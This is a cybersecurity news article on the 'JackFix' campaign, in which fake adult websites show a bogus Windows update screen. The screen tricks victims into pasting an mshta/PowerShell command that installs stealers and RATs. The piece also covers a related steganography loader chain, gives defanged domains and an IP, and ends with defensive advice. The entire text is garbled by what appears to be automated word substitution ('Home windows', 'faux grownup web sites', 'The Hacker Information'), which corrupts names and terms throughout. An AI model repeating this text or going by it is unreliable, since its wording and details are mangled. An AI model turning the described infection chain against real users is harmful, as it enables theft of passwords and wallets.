Cybersecurity researchers are calling consideration to a brand new marketing campaign that is leveraging a mixture of ClickFix lures and faux grownup web sites to deceive customers into operating malicious instructions underneath the guise of a “crucial” Home windows safety replace.
“Marketing campaign leverages faux grownup web sites (xHamster, PornHub clones) as its phishing mechanism, possible distributed through malvertising,” Acronis mentioned in a brand new report shared with The Hacker Information. “The grownup theme, and potential connection to shady web sites, provides to the sufferer’s psychological strain to adjust to sudden ‘safety replace’ set up.”
ClickFix-style assaults have surged over the previous 12 months, usually tricking customers into operating malicious instructions on their very own machines utilizing prompts for technical fixes or finishing CAPTCHA verification checks. In accordance with knowledge from Microsoft, ClickFix has change into the most typical preliminary entry technique, accounting for 47% of assaults.
The most recent marketing campaign shows extremely convincing faux Home windows replace screens in an try and get the sufferer to run malicious code, indicating that attackers are shifting away from the normal robot-check lures. The exercise has been codenamed JackFix by the Singapore-based cybersecurity firm.
Maybe essentially the most regarding side of the assault is that the phony Home windows replace alert hijacks the whole display and instructs the sufferer to open the Home windows Run dialog, press Ctrl + V, and hit Enter, thereby triggering the an infection sequence.
It is assessed that the start line of the assault is a faux grownup web site to which unsuspecting customers are redirected through malvertising or different social engineering strategies, solely to all of a sudden serve them an “pressing safety replace.” Choose iterations of the websites have been discovered to incorporate developer feedback in Russian, hinting at the opportunity of a Russian-speaking risk actor.
“The Home windows Replace display is created totally utilizing HTML and JavaScript code, and pops up as quickly because the sufferer interacts with any factor on the phishing web site,” safety researcher Eliad Kimhy mentioned. “The web page makes an attempt to go full display through JavaScript code, whereas on the identical time creating a reasonably convincing Home windows Replace window composed of a blue background and white textual content, harking back to Home windows’ notorious blue display of loss of life.”
What’s notable concerning the assault is that it closely leans on obfuscation to hide ClickFix-related code, in addition to blocks customers from escaping the full-screen alert by disabling the Escape and F11 buttons, together with F5 and F12 keys. Nevertheless, as a result of defective logic, customers can nonetheless press the Escape and F11 buttons to do away with the total display.
The preliminary command executed is an MSHTA payload that is launched utilizing the reliable mshta.exe binary, which, in flip, incorporates JavaScript designed to run a PowerShell command to retrieve one other PowerShell script from a distant server. These domains are designed such that instantly navigating to those addresses redirects the consumer to a benign web site like Google or Steam.
“Solely when the positioning is reached out to through an irm or iwr PowerShell command does it reply with the right code,” Acronis defined. “This creates an additional layer of obfuscation and evaluation prevention.”
 |
| UAC request to grant attackers admin privileges |
The downloaded PowerShell script additionally packs in numerous obfuscation and anti-analysis mechanisms, one among which is the usage of rubbish code to complicate evaluation efforts. It additionally makes an attempt to raise privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths the place the payloads are staged.
To attain privilege escalation, the malware makes use of the Begin-Course of cmdlet along with the “-Verb RunAs” parameter to launch PowerShell with administrative rights and constantly prompts for permission till it is granted by the sufferer. As soon as this step is profitable, the script is designed to drop further payloads, akin to easy distant entry trojans (RATs) which might be programmed to contact a C2 server, presumably to drop extra malware.
The PowerShell script has additionally been noticed to serve as much as eight totally different payloads, with Acronis describing it because the “most egregious instance of spray and pray.” These embody Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, in addition to different unspecified loaders and RATs.
“If solely one among these payloads manages to run efficiently, victims threat shedding passwords, crypto wallets, and extra,” Kimhy mentioned. “Within the case of some of those loaders — the attacker could select to usher in different payloads into the assault, and the assault can shortly escalate additional.”
The disclosure comes as Huntress detailed a multi-stage malware execution chain that originates from a ClickFix lure masquerading as a Home windows replace and deploys stealer malware like Lumma and Rhadamanthys by concealing the ultimate levels inside a picture, a method often called steganography.
Like within the case of the aforementioned marketing campaign, the ClickFix command copied to the clipboard and pasted into the Run dialog makes use of mshta.exe to run a JavaScript payload that is able to operating a remotely-hosted PowerShell script instantly in reminiscence.
The PowerShell code is used to decrypt and launch a .NET meeting payload, a loader dubbed Stego Loader that serves as a conduit for the execution of Donut-packed shellcode hidden inside an embedded and encrypted PNG file. The extracted shellcode is then injected right into a goal course of to finally deploy Lumma or Rhadamanthys.
Apparently, one of many domains listed by Huntress as getting used to fetch the PowerShell script (“securitysettings[.]stay”) has additionally been flagged by Acronis, suggesting these two exercise clusters could also be associated.
“The risk actor usually adjustments the URI (/tick.odd, /gpsc.dat, /ercx.dat, and so forth.) used to host the primary mshta.exe stage,” safety researchers Ben Folland and Anna Pham mentioned within the report.
“Moreover, the risk actor moved from internet hosting the second stage on the area securitysettings[.]stay and as an alternative hosted on xoiiasdpsdoasdpojas[.]com, though each level to the identical IP tackle 141.98.80[.]175, which was additionally used to ship the primary stage [i.e., the JavaScript code run by mshta.exe].”
ClickFix has change into vastly profitable because it depends on a easy but efficient technique, which is to entice a consumer into infecting their very own machine and bypassing safety controls. Organizations can defend in opposition to such assaults by coaching workers to raised spot the risk and disabling the Home windows Run field through Registry adjustments or Group Coverage.
